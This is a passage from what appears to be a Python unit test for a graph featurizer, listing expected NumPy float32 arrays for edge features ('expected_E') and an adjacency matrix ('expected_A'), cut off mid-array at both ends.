0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00],
[0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00, 0.0000000e+00, 0.0000000e+00,
0.0000000e+00, 0.0000000e+00]], dtype=np.float32)
expected_E = np.array([[np.zeros(shape=(S)),
[1.00000000e+00, 3.80209351e+00, 4.73696232e+00,
2.55590057e+00, 1.94406962e+00, 3.78623873e-01, 0, 2.52958393e+00, 2.83850670e+00,
1.11976581e-17, 3.14159274e+00, 2.22044605e-16,
1.10479271e+00, 0, 0, 0, 0, 0,
-4.57205915e+00, 8.80855896e+02, 7.82728672e+00,
3.35431993e-01, -1.00192909e+01, 0, 0, 0, 0, 0],
[0, 7.28560734e+00, 7.28560686e+00,
1.16697186e-06, 2.57872105e+00, 9.72977459e-01,
6.93147182e-01, 6.20201683e+00, 3.82296467e+00,
6.42421180e-16, -5.30027373e-16, -2.22044605e-16,
-1.79768915e-06, 0, 0, 0, 0, 0,
-1.92229003e-01, 0, 2.19786674e-01,
-5.78640960e-02, -3.56009841e-01, 0, 0, 0, 0, 0],
[0, 1.09825363e+01, 1.13401499e+01,
3.00454664e+00, 2.43993378e+00, 7.23135471e-01,
1.09861231e+00, 8.73160267e+00, 6.66147280e+00,
-2.44219418e-17, 3.14159274e+00, 4.44089210e-16,
1.10479355e+00, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1.45712175e+01, 1.45712175e+01,
9.06385296e-08, 2.57872105e+00, 9.72977459e-01,
1.38629436e+00, 1.24040346e+01, 7.64593363e+00,
1.28483897e-15, -1.06005580e-15, -6.66133815e-16,
-1.39626337e-07, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S))],
[[1.00000000e+00, 3.80209351e+00, 4.73696232e+00,
2.55590057e+00, -3.41464520e-01, 1.50724781e+00, 0, -3.67243147e+00, -9.84460473e-01,
4.68176749e-17, -3.14159274e+00, -2.22044605e-16,
1.10479271e+00, 0, 0, 0, 0, 0,
-4.57205915e+00, 8.80855896e+02, 7.82728672e+00,
3.35431993e-01, -1.00192909e+01, 0, 0, 0, 0, 0],
np.zeros(shape=(S)),
[1.00000000e+00, 3.80209446e+00, 4.73696232e+00,
2.55590081e+00, 1.94406879e+00, 3.78623903e-01, 0, 2.52958250e+00, 2.83850908e+00,
1.11970799e-17, 3.14159274e+00, 2.22044605e-16,
1.10479450e+00, 0, 0, 0, 0, 0,
-2.22846270e+00, 2.04876663e+02, 2.69857574e+00,
-1.21587858e-01, -1.10309076e+00, 0, 0, 0, 0, 0],
[0, 7.28560972e+00, 7.28560925e+00,
5.55161478e-07, 2.57872009e+00, 9.72977221e-01,
6.93147182e-01, 6.20201588e+00, 3.82297087e+00,
6.42420386e-16, -5.30027532e-16, -2.22044605e-16,
-8.55211340e-07, 0, 0, 0, 0, 0,
-7.39678815e-02, 0, 1.09441765e-01,
-1.31108221e-02, 1.17330207e-02, 0, 0, 0, 0, 0],
[0, 1.09825373e+01, 1.13401508e+01,
3.00454545e+00, 2.43993306e+00, 7.23135352e-01,
1.09861231e+00, 8.73160076e+00, 6.66147757e+00,
-2.44209194e-17, 3.14159274e+00, 4.44089210e-16,
1.10479283e+00, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1.45712175e+01, 1.45712166e+01,
1.07633355e-06, 2.57872057e+00, 9.72977340e-01,
1.38629436e+00, 1.24040337e+01, 7.64593601e+00,
1.28484437e-15, -1.06005464e-15, -6.66133815e-16,
-1.65806284e-06, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)),
np.zeros(shape=(S))],
[[0, 7.28560734e+00, 7.28560686e+00,
1.16697186e-06, -5.62873721e-01, 2.16861582e+00,
6.93147182e-01, -6.20201015e+00, -3.82297587e+00,
-6.42420810e-16, 5.30027955e-16, 4.44089210e-16,
1.79768915e-06, 0, 0, 0, 0, 0,
-1.92229003e-01, 0, 2.19786674e-01,
-5.78640960e-02, -3.56009841e-01, 0, 0, 0, 0, 0],
[1.00000000e+00, 3.80209446e+00, 4.73696232e+00,
2.55590081e+00, -3.41465622e-01, 1.50724840e+00, 0, -3.67243123e+00, -9.84464645e-01,
4.68172051e-17, -3.14159274e+00, -2.22044605e-16,
1.10479450e+00, 0, 0, 0, 0, 0,
-2.22846270e+00, 2.04876663e+02, 2.69857574e+00,
-1.21587858e-01, -1.10309076e+00, 0, 0, 0, 0, 0],
np.zeros(shape=(S)),
[1.00000000e+00, 3.80209589e+00, 4.73696327e+00,
2.55589986e+00, 1.94406736e+00, 3.78624082e-01, 0, 2.52958083e+00, 2.83851242e+00,
1.11972230e-17, 3.14159274e+00, 2.22044605e-16,
1.10479534e+00, 0, 0, 0, 0, 0,
-1.31169045e+00, 6.74720097e+00, 1.67359757e+00,
1.66524708e-01, 1.47069490e+00, 0, 0, 0, 0, 0],
[0, 7.28561020e+00, 7.28561068e+00,
-1.07633332e-06, 2.57871890e+00, 9.72976923e-01,
6.93147182e-01, 6.20201063e+00, 3.82297993e+00,
6.42419380e-16, -5.30027955e-16, -2.22044605e-16,
1.65806284e-06, 0, 0, 0, 0, 0,
-6.20821118e-01, 0, 8.71631145e-01,
1.06285838e-03, -7.25033402e-01, 0, 0, 0, 0, 0],
[0, 1.09825373e+01, 1.13401508e+01,
3.00454521e+00, 2.43993092e+00, 7.23134995e-01,
1.09861231e+00, 8.73158836e+00, 6.66149330e+00,
-2.44247823e-17, 3.14159274e+00, 4.44089210e-16,
1.10479617e+00, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1.45712204e+01, 1.45712204e+01,
-8.27077542e-07, 2.57871866e+00, 9.72976804e-01,
1.38629436e+00, 1.24040203e+01, 7.64596176e+00,
1.28483802e-15, -1.06005549e-15, -6.66133815e-16,
1.27409032e-06, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S))],
[[0, 1.09825363e+01, 1.13401499e+01,
3.00454664e+00, -4.65556115e-01, 1.91248298e+00,
1.09861231e+00, -9.87444305e+00, -4.80743980e+00,
8.24374220e-17, -3.14159274e+00, -4.44089210e-16,
1.10479355e+00, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 7.28560972e+00, 7.28560925e+00,
5.55161478e-07, -5.62873423e-01, 2.16861558e+00,
6.93147182e-01, -6.20201254e+00, -3.82297611e+00,
-6.42420704e-16, 5.30027796e-16, 4.44089210e-16,
8.55211340e-07, 0, 0, 0, 0, 0,
-7.39678815e-02, 0, 1.09441765e-01,
-1.31108221e-02, 1.17330207e-02, 0, 0, 0, 0, 0],
[1.00000000e+00, 3.80209589e+00, 4.73696327e+00,
2.55589986e+00, -3.41465712e-01, 1.50724864e+00, 0, -3.67243266e+00, -9.84464884e-01,
4.68171190e-17, -3.14159274e+00, -2.22044605e-16,
1.10479534e+00, 0, 0, 0, 0, 0,
-1.31169045e+00, 6.74720097e+00, 1.67359757e+00,
1.66524708e-01, 1.47069490e+00, 0, 0, 0, 0, 0],
np.zeros(shape=(S)),
[1.00000000e+00, 3.80209374e+00, 4.73696232e+00,
2.55589986e+00, 1.94406843e+00, 3.78623903e-01, 0, 2.52958202e+00, 2.83850884e+00,
1.11975100e-17, 3.14159274e+00, 2.22044605e-16,
1.10479379e+00, 0, 0, 0, 0, 0,
-3.67839885e+00, 8.79898254e+02, 6.06281567e+00,
3.71687233e-01, -4.08100748e+00, 0, 0, 0, 0, 0],
[0, 7.28560781e+00, 7.28560734e+00,
5.21172012e-07, 2.57872009e+00, 9.72977221e-01,
6.93147182e-01, 6.20201397e+00, 3.82297063e+00,
6.42420863e-16, -5.30027426e-16, -2.22044605e-16,
-8.02851446e-07, 0, 0, 0, 0, 0,
-2.02662915e-01, 0, 2.20212236e-01,
-5.84062114e-02, -3.69073659e-01, 0, 0, 0, 0, 0],
[0, 1.09825373e+01, 1.13401508e+01,
3.00454569e+00, 2.43993258e+00, 7.23135293e-01,
1.09861231e+00, 8.73159790e+00, 6.66148043e+00,
-2.44220195e-17, 3.14159274e+00, 4.44089210e-16,
1.10479414e+00, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1.45712185e+01, 1.45712194e+01,
-1.58617510e-07, 2.57872009e+00, 9.72977221e-01,
1.38629436e+00, 1.24040298e+01, 7.64594460e+00,
1.28483982e-15, -1.06005559e-15, -6.66133815e-16,
2.44346097e-07, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)),
np.zeros(shape=(S))],
[[0, 1.45712175e+01, 1.45712175e+01,
9.06385296e-08, -5.62871814e-01, 2.16861534e+00,
1.38629436e+00, -1.24040337e+01, -7.64593506e+00,
-1.28483844e-15, 1.06005591e-15, 6.66133815e-16,
1.39626337e-07, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1.09825373e+01, 1.13401508e+01,
3.00454545e+00, -4.65554893e-01, 1.91248250e+00,
1.09861231e+00, -9.87444973e+00, -4.80742836e+00,
8.24393609e-17, -3.14159274e+00, -4.44089210e-16,
1.10479283e+00, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 7.28561020e+00, 7.28561068e+00,
-1.07633332e-06, -5.62871873e-01, 2.16861534e+00,
6.93147182e-01, -6.20201731e+00, -3.82296968e+00,
-6.42419433e-16, 5.30027373e-16, 4.44089210e-16,
-1.65806284e-06, 0, 0, 0, 0, 0,
-6.20821118e-01, 0, 8.71631145e-01,
1.06285838e-03, -7.25033402e-01, 0, 0, 0, 0, 0],
[1.00000000e+00, 3.80209374e+00, 4.73696232e+00,
2.55589986e+00, -3.41464877e-01, 1.50724792e+00, 0, -3.67243147e+00, -9.84461367e-01,
4.68175161e-17, -3.14159274e+00, -2.22044605e-16,
1.10479379e+00, 0, 0, 0, 0, 0,
-3.67839885e+00, 8.79898254e+02, 6.06281567e+00,
3.71687233e-01, -4.08100748e+00, 0, 0, 0, 0, 0],
np.zeros(shape=(S)),
[1.00000000e+00, 3.80209446e+00, 4.73696232e+00,
2.55590081e+00, 1.94406879e+00, 3.78623903e-01, 0, 2.52958250e+00, 2.83850908e+00,
1.11970799e-17, 3.14159274e+00, 2.22044605e-16,
1.10479450e+00, 0, 0, 0, 0, 0,
-2.22846270e+00, 2.04876663e+02, 2.69857574e+00,
-1.21587858e-01, -1.10309076e+00, 0, 0, 0, 0, 0],
[0, 7.28561020e+00, 7.28560972e+00,
2.49256118e-07, 2.57872009e+00, 9.72977221e-01,
6.93147182e-01, 6.20201588e+00, 3.82297158e+00,
6.42420122e-16, -5.30027690e-16, -2.22044605e-16,
-3.83972434e-07, 0, 0, 0, 0, 0,
-6.45447522e-02, 0, 1.05444595e-01,
-1.05051743e-02, -1.32832214e-01, 0, 0, 0, 0, 0],
[0, 1.09825382e+01, 1.13401518e+01,
3.00454569e+00, 2.43993282e+00, 7.23135352e-01,
1.09861231e+00, 8.73160076e+00, 6.66147947e+00,
-2.44219004e-17, 3.14159274e+00, 4.44089210e-16,
1.10479343e+00, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)),
np.zeros(shape=(S))],
[np.zeros(shape=(S)),
[0, 1.45712175e+01, 1.45712166e+01,
1.07633355e-06, -5.62873960e-01, 2.16861582e+00,
1.38629436e+00, -1.24040203e+01, -7.64595652e+00,
-1.28484427e-15, 1.06005580e-15, 6.66133815e-16,
1.65806284e-06, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1.09825373e+01, 1.13401508e+01,
3.00454521e+00, -4.65556622e-01, 1.91248310e+00,
1.09861231e+00, -9.87444305e+00, -4.80744314e+00,
8.24356883e-17, -3.14159274e+00, -4.44089210e-16,
1.10479617e+00, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 7.28560781e+00, 7.28560734e+00,
5.21172012e-07, -5.62873483e-01, 2.16861558e+00,
6.93147182e-01, -6.20201111e+00, -3.82297564e+00,
-6.42420492e-16, 5.30027690e-16, 4.44089210e-16,
8.02851446e-07, 0, 0, 0, 0, 0,
-2.02662915e-01, 0, 2.20212236e-01,
-5.84062114e-02, -3.69073659e-01, 0, 0, 0, 0, 0],
[1.00000000e+00, 3.80209446e+00, 4.73696232e+00,
2.55590081e+00, -3.41465622e-01, 1.50724840e+00, 0, -3.67243123e+00, -9.84464645e-01,
4.68172051e-17, -3.14159274e+00, -2.22044605e-16,
1.10479450e+00, 0, 0, 0, 0, 0,
-2.22846270e+00, 2.04876663e+02, 2.69857574e+00,
-1.21587858e-01, -1.10309076e+00, 0, 0, 0, 0, 0],
np.zeros(shape=(S)),
[1.00000000e+00, 3.80209589e+00, 4.73696375e+00,
2.55589986e+00, 1.94406760e+00, 3.78624111e-01, 0, 2.52958155e+00, 2.83851218e+00,
1.11973512e-17, 3.14159274e+00, 2.22044605e-16,
1.10479486e+00, 0, 0, 0, 0, 0,
-7.31544256e-01, 1.80469227e+00, 3.98014307e-01,
-1.71806701e-02, -2.58314610e-01, 0, 0, 0, 0, 0],
[0, 7.28561115e+00, 7.28561163e+00,
-6.79789594e-07, 2.57871914e+00, 9.72976923e-01,
6.93147182e-01, 6.20201254e+00, 3.82297897e+00,
6.42419963e-16, -5.30027796e-16, -2.22044605e-16,
1.04719754e-06, 0, 0, 0, 0, 0,
-4.29591179e-01, 0, -7.36617744e-02,
-4.40440699e-02, -9.07294303e-02, 0, 0, 0, 0, 0],
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)),
np.zeros(shape=(S))],
[np.zeros(shape=(S)),
np.zeros(shape=(S)),
[0, 1.45712204e+01, 1.45712204e+01,
-8.27077542e-07, -5.62872589e-01, 2.16861534e+00,
1.38629436e+00, -1.24040298e+01, -7.64594603e+00,
-1.28483876e-15, 1.06005464e-15, 6.66133815e-16,
-1.27409032e-06, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1.09825373e+01, 1.13401508e+01,
3.00454569e+00, -4.65555817e-01, 1.91248286e+00,
1.09861231e+00, -9.87444592e+00, -4.80743694e+00,
8.24373029e-17, -3.14159274e+00, -4.44089210e-16,
1.10479414e+00, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 7.28561020e+00, 7.28560972e+00,
2.49256118e-07, -5.62872946e-01, 2.16861558e+00,
6.93147182e-01, -6.20201445e+00, -3.82297397e+00,
-6.42420439e-16, 5.30027796e-16, 4.44089210e-16,
3.83972434e-07, 0, 0, 0, 0, 0,
-6.45447522e-02, 0, 1.05444595e-01,
-1.05051743e-02, -1.32832214e-01, 0, 0, 0, 0, 0],
[1.00000000e+00, 3.80209589e+00, 4.73696375e+00,
2.55589986e+00, -3.41465414e-01, 1.50724852e+00, 0, -3.67243314e+00, -9.84463811e-01,
4.68172481e-17, -3.14159274e+00, -2.22044605e-16,
1.10479486e+00, 0, 0, 0, 0, 0,
-7.31544256e-01, 1.80469227e+00, 3.98014307e-01,
-1.71806701e-02, -2.58314610e-01, 0, 0, 0, 0, 0],
np.zeros(shape=(S)),
[1.00000000e+00, 3.80209470e+00, 4.73696280e+00,
2.55590081e+00, 1.94406915e+00, 3.78623962e-01, 0, 2.52958345e+00, 2.83850884e+00,
1.11972619e-17, 3.14159274e+00, 2.22044605e-16,
1.10479391e+00, 0, 0, 0, 0, 0,
-2.75101089e+00, 7.84158997e+02, 4.00388569e-01,
2.45321058e-02, -1.18683946e+00, 0, 0, 0, 0, 0],
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)),
np.zeros(shape=(S))],
[np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)),
[0, 1.45712185e+01, 1.45712194e+01,
-1.58617510e-07, -5.62872350e-01, 2.16861534e+00,
1.38629436e+00, -1.24040318e+01, -7.64594173e+00,
-1.28483844e-15, 1.06005538e-15, 6.66133815e-16,
-2.44346097e-07, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1.09825382e+01, 1.13401518e+01,
3.00454569e+00, -4.65555400e-01, 1.91248274e+00,
1.09861231e+00, -9.87444878e+00, -4.80743361e+00,
8.24388779e-17, -3.14159274e+00, -4.44089210e-16,
1.10479343e+00, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 7.28561115e+00, 7.28561163e+00,
-6.79789594e-07, -5.62872410e-01, 2.16861534e+00,
6.93147182e-01, -6.20201635e+00, -3.82297254e+00,
-6.42419645e-16, 5.30027426e-16, 4.44089210e-16,
-1.04719754e-06, 0, 0, 0, 0, 0,
-4.29591179e-01, 0, -7.36617744e-02,
-4.40440699e-02, -9.07294303e-02, 0, 0, 0, 0, 0],
[1.00000000e+00, 3.80209470e+00, 4.73696280e+00,
2.55590081e+00, -3.41465175e-01, 1.50724828e+00, 0, -3.67243195e+00, -9.84463096e-01,
4.68173837e-17, -3.14159274e+00, -2.22044605e-16,
1.10479391e+00, 0, 0, 0, 0, 0,
-2.75101089e+00, 7.84158997e+02, 4.00388569e-01,
2.45321058e-02, -1.18683946e+00, 0, 0, 0, 0, 0],
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S)), np.zeros(shape=(S)),
np.zeros(shape=(S))],
np.zeros(shape=(N, S)), np.zeros(shape=(N, S)),
np.zeros(shape=(N, S)), np.zeros(shape=(N, S)),
np.zeros(shape=(N, S)), np.zeros(shape=(N, S)),
np.zeros(shape=(N, S)), np.zeros(shape=(N, S)),
np.zeros(shape=(N, S)), np.zeros(shape=(N, S)),
np.zeros(shape=(N, S)), np.zeros(shape=(N, S)),
np.zeros(shape=(N, S)), np.zeros(shape=(N, S)),
np.zeros(shape=(N, S)), np.zeros(shape=(N, S)),
np.zeros(shape=(N, S)), np.zeros(shape=(N, S)),
np.zeros(shape=(N, S)), np.zeros(shape=(N, S)),
np.zeros(shape=(N, S)), np.zeros(shape=(N, S))], dtype=np.float32)
expected_A = np.array([[0., 1., 1., 1., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[1., 0., 1., 1., 1., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[1., 1., 0., 1., 1., 1., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[1., 1., 1., 0., 1., 1., 1., 1., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[1., 1., 1., 1., 0., 1., 1., 1., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 1., 1., 1., 1., 0., 1., 1., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 1., 1., 1., 1., 0., 1., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 1., 1., 1., 1., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
